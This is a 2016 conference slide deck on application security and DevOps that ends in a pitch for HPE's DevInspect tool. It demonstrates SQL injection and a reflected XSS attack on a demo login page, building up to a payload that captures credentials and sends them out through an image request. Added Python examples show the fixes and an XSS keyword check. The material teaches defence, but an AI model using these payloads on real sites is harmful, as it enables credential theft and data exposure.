Discover Best of Show 2016
2-3 March 2016, Düsseldorf
Software Security in the Age of DevOps
Lucas von Stockhausen, Regional Product Manager Fortify
The case for Application Security
I am secure – I have a firewall
Malware over the years
Source: HPE Security Research, Cyber Risk Report 2016
There is a breach in the headlines almost every day
Source: http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
Aircraft Accidents over the years
[Chart: Aircraft Accidents. Number of accidents and fatalities per year (excluding sabotage, shoot-downs); x-axis Year, y-axes Accidents and Casualties]
Source: https://aviation-safety.net/statistics/period/
The increase in attacks is constant
Sources: Ponemon Cost of Cyber Crime Study 2015; Ponemon Cost of Cyber Crime Study 2012
Existing network and perimeter based security is insufficient
84% of breaches exploit vulnerabilities in the application layer
Yet the ratio of spending between perimeter security and application security is 23-to-1
Source: Gartner Maverick Research: Stop Protecting Your Apps; It’s Time for Apps to Protect Themselves (2014)
Basic hacking example
Live example
– SQL injection
– Telnet
– Cross-site scripting
SQL-Injection
Vulnerable code: the itemName request parameter is concatenated into the query text without escaping or parameter binding.
String userName = ctx.getAuthenticatedUserName();
String itemName = request.getParameter("itemName");  // attacker-controlled
String query = "SELECT * FROM items WHERE owner = '"
    + userName + "' AND itemname = '" + itemName + "'";
ResultSet rs = stmt.executeQuery(query);
Input:
username = lucas
itemname = x' or 1=1; --
With the input substituted into the concatenation:
String query = "SELECT * FROM items WHERE owner = '"
    + "lucas" + "' AND itemname = '" + "x' or 1=1; --" + "'";
Resulting query (the comment marker swallows the closing quote, and "or 1=1" makes the WHERE clause true for every row, so the user sees items that are not theirs):
SELECT * FROM items WHERE owner = 'lucas' AND itemname = 'x' or 1=1; -- '
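Added example, not code from the slides: the same concatenated query against a constructed in-memory SQLite table, next to the parameterised version that binds the values instead of pasting them into SQL text. The table layout (owner, itemname) and the rows are assumed.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the "items" table on the slide.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (owner TEXT, itemname TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [("lucas", "laptop"), ("lucas", "badge"), ("alice", "secret-file")])
    return conn

def vulnerable_lookup(conn, user_name, item_name):
    # Same construction as the slide: the untrusted itemName becomes part of the SQL text,
    # so quote characters and comment markers in it change the meaning of the statement.
    query = ("SELECT owner, itemname FROM items WHERE owner = '" + user_name
             + "' AND itemname = '" + item_name + "'")
    return conn.execute(query).fetchall()

def safe_lookup(conn, user_name, item_name):
    # Parameterised query: the driver binds the values, which are never parsed as SQL,
    # so the payload is simply compared as a (non-existent) item name.
    query = "SELECT owner, itemname FROM items WHERE owner = ? AND itemname = ?"
    return conn.execute(query, (user_name, item_name)).fetchall()

PAYLOAD = "x' or 1=1; --"   # the input shown on the slide

if __name__ == "__main__":
    conn = make_db()
    print(vulnerable_lookup(conn, "lucas", PAYLOAD))  # every row, including alice's
    print(safe_lookup(conn, "lucas", PAYLOAD))        # [] - nothing is literally named that
```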
Telnet session
XSS – Cross-Site Scripting
Real-world payloads
– So, what is XSS truly capable of? What can you execute?
– Simple answer: JavaScript
– Wait. That weak-sauce web scripting language that you had to learn in college back in the day? How bad could it be?
– JavaScript is a full-featured programming language:
  – Object-oriented
  – C-like syntax
  – Extremely powerful
  – Native in every browser
– In sum, being able to run JavaScript on a victim’s browser has a LOT of potential
– Let’s take a look at a possible attack and how to build it up
– Let’s go to http://legacy.webappsecurity.com
Building up the payload, step by step:
– http://legacy.webappsecurity.com
– http://legacy.webappsecurity.com/banklogin.asp?err=<script>alert("buh");</script>
– http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); alert("username="%2B%0Ausername%2B%0A" and password="%2B%0Apassword);</script>
– http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write('<img src="http://localhost:8080/splc/images/top.jpg" alt=""'); document.write('<br>Invalid Login: '%2B%0Ausername);</script>
– http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write('<img src="http://localhost:8080/splc/listMyItems.do?username='%2Busername%2B'%26password='%2Bpassword%2B'">'); document.write('<br>Invalid Login: '%2Busername);</script>
– There are many other possibilities and opportunities
– Remember, if these are the easy options, imagine what others are capable of!
– There are a number of ways to launch the actual attack:
  – Stored XSS
  – Reflected XSS
  – Owning a page that a victim visits
– Remember, navigating to a page is permission to run what’s on that page
– Consider visiting a webpage an act of significant trust
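Added example, not from the slides: the reflected err parameter of a login page like the one above, rendered once the way the vulnerable page does it and once with HTML output encoding, plus a coarse log-side check. The page markup and the two request URLs are constructed assumptions.

```python
import html
from urllib.parse import urlsplit, unquote_plus

# Constructed request URLs modelled on the slides' banklogin.asp?err=... examples.
BENIGN_URL = "http://legacy.webappsecurity.com/banklogin.asp?err=Invalid+Login"
HOSTILE_URL = 'http://legacy.webappsecurity.com/banklogin.asp?err=<script>alert("buh");</script>'

def err_param(url):
    """Return the decoded 'err' query parameter as the server-side page would see it."""
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "err":
            return unquote_plus(value)  # %2B / %0A in the slide URLs decode to '+' and newline
    return ""

def render_error_unsafe(msg):
    # What the vulnerable page does: the parameter is echoed verbatim into the HTML body,
    # so a <script> element inside it is parsed and executed by the browser.
    return "<p class='error'>" + msg + "</p>"

def render_error_safe(msg):
    # Output encoding for the HTML text context: <, >, &, " and ' become entities,
    # so the browser displays the payload as text instead of running it.
    return "<p class='error'>" + html.escape(msg, quote=True) + "</p>"

def looks_like_xss_attempt(msg):
    # Coarse signal for request-log monitoring; the encoding above is the actual fix.
    low = msg.lower()
    return any(m in low for m in ("<script", "javascript:", "onerror=", "onload=", "document.write"))

if __name__ == "__main__":
    for url in (BENIGN_URL, HOSTILE_URL):
        msg = err_param(url)
        print(looks_like_xss_attempt(msg), render_error_unsafe(msg), render_error_safe(msg), sep="\n")
```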
What is the reason
Today’s approach > expensive, reactive
1. Somebody builds insecure software
2. IT deploys the insecure software
3. We are breached or pay someone to tell us our code is insecure
4. We convince & pay the developer to fix it
Why it doesn’t work: 30x more costly to secure in production
– After an application is released into Production, it costs 30x more than during design.
[Chart: relative cost of fixing a defect by SDLC phase: Requirements, Coding, Integration/component testing, System testing, Production; y-axis Cost. Source: NIST]
This is application security
The right approach > systematic, proactive
1. Embed security into the SDLC development process
2. Leverage a security gate to validate the resiliency of internal or external code (in-house, outsourced, commercial, open source) before Production
3. Monitor and protect software running in Production
Improve SDLC policies
The help:
– Static Application Security Testing (SAST)
– Dynamic Application Security Testing (DAST)
– Interactive Application Security Testing (IAST)
– Runtime Application Self Protection (RASP)
Example Process for Analysis
[Diagram: security and development teams around the Fortify SSC Server]
– Security roles: CISO, Project Security Lead, Security Auditor
– Development roles: Development Manager, Developer (IDE)
– Components: Fortify SSC Server, AWB, Fortify SCA, Fortify CM, WebInspect, Build Tool, Source Code Repository(s), Central Build Server(s), Defect Tracking System (CM)
– Steps: 1. Identify, 2. Audit, 3. Assign, 4. Fix, 5. Validate, 6. Report; Monitor
Movement to DevOps
• Business leaders have “Agility” at the top of their priorities as they prepare for the fast-paced, very competitive future.
• Processes need to be further streamlined, minimize resource consumption and reduce time-to-market.
Security context
• Development organizations can save time and money by building in security early in the development process
Challenges in a DevOps environment
• Developers are not security experts
• Security testing is an afterthought
• Pressure to push out software into production leaves no time for security
• Security assessments take up resources
Introducing HPE Security DevInspect
Bringing application security closer to the Developer
• AppSec solution created for developers to identify and remediate security vulnerabilities in source code within the native developer environment.
• Brings market-leading AppSec technologies directly to the developer, ensuring secure code as you “shift left” in your dev process.
• Real-time, instant security results as the developer is writing code.
• Enables developers to assess for security weaknesses.
End to End Application Security
[Diagram: Static, Dynamic and Runtime coverage across Application Development, on-premise and on-demand: DevInspect, Fortify on Demand, App Defender]
HPE Security DevInspect:
• Static Code Analysis
• Real-time lightweight analysis of the source code
• Dynamic Analysis
• Runtime Analysis
• Documentation
What’s included in DevInspect 1.0?
• Static Code Analysis
• Real-time lightweight analysis of the source code
• Integration for Fortify Software Security Center (SSC)
• Integration for Fortify on Demand (FoD)
• Documentation
Key Benefits
DESIGNED FOR THE DEVELOPER
• Fully integrated into the native development environment (IDE)
• Supports the DevOps toolchain
• Provides thorough and robust software security analysis of an application
INSTANT RESULTS (Fast)
• Inline analysis of the source code as the developer types, providing immediate feedback
• Out of the box results – no configuration required
CONTINUOUS FEEDBACK
• Continuously updated security findings as code is written
• Tracks findings and guides developers toward remediation
Example Process for Static Analysis in DevOps
[Diagram: security and development teams around the Fortify SSC Server]
– Security roles: CISO, Project Security Lead, Security Auditor
– Development roles: Development Manager, Developer (IDE)
– Components: Fortify SSC Server, AWB, Fortify SCA, Fortify CM, WebInspect, Build Tool, Source Code Repository(s), Central Build Server(s), Defect Tracking System (CM)
– Steps: 1. DevInspect, 2. Checkin, 3. Milestone Scan, 4. Validate, 5. Report; Monitor
Security Assistant: Real-time lightweight analysis of the source code
[Screenshot of the IDE integration:]
– All issues detected in the project
– Fortify icon added to the icon bar
– Vulnerable line of code highlighted & tool tip for additional information
– Detailed remediation advice
– Fortify menu for additional options
Thank you